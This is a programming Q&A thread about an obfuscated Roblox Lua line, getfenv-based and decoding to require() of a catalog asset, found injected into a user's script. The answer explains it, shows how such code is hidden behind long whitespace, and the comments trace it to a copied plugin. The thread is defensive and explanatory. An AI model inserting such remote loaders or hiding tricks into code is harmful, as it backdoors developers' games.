# Random Code appearing in My Script, Is it a Virus?

Tags: lua, roblox

As I was completely Redoing my DataStores script, I got to the very end Where I do game:BindToClose(function() and I just loop through all the players doing what I do on PlayerRemoving. I hit enter after game:BindToClose(function() and this code appeared on the line beneath it. Does this mean my game has a virus?! Or is this just a bug with roblox

```
getfenv()['\114\101\113\117\105\114\101'](5151855975)
```

Answer (score 3, accepted):

Did you write this DataStores script, or did you modify an existing one from the Toolbox?

`getfenv` and `setfenv` are consistently used in malicious scripts to dynamically execute code that's difficult to read and understand from looking at it.
This line is executing `require(5151855975)`, which will dynamically load [an asset](https://www.roblox.com/library/5151855975/Content-Deleted) from the Roblox catalog. Luckily in this case, this asset has already been moderated, so it won't do anything if it does get loaded in.

Often times, these malicious lines are hidden past the end of real code, using spaces to push the malicious code far offscreen. :

```
print("This is a normal line")   <add 200 spaces>    print("here is a hidden line of code")
```

It sounds like when you hit enter, you accidentally revealed some secret, malicious code. You can probably delete safely it without your script breaking.

Comment: I honestly don't remember if I wrote the Original Original Original script, as I have continued to learn lua I have modified and redone scripts once I learned a better way. I will check if there are any more.

Comment: I am so happy you responded to this, I think a plugin I installed a while back had malicious code because I used find results and found that it was in almost every one of my scripts

Comment: I removed all my my plugins and removed the code. How do I find which plugin caused the code without getting it back into my game?

Comment: I was hoping you could tell me which plugin it was. If you don't mind me asking, how many plugins do you have installed?

Comment: Actually think I found the one, thank you so much! Yes the asset was already moderated but now I know about malicious code and how to remove and possibly prevent it!

Comment: I have already reported this but I think this is the plugin, https://www.roblox.com/library/5915962088/uiDesign-Plus-STABLE I havent had anything like this happen before and I recently tried this plugin, after further looking into this plugin i realized its a copy of Stelrex's plugin which almost definately means it was the cause. And it didnt work when I installed it, I think that should have told me this was infested with malicious code, but hey know I now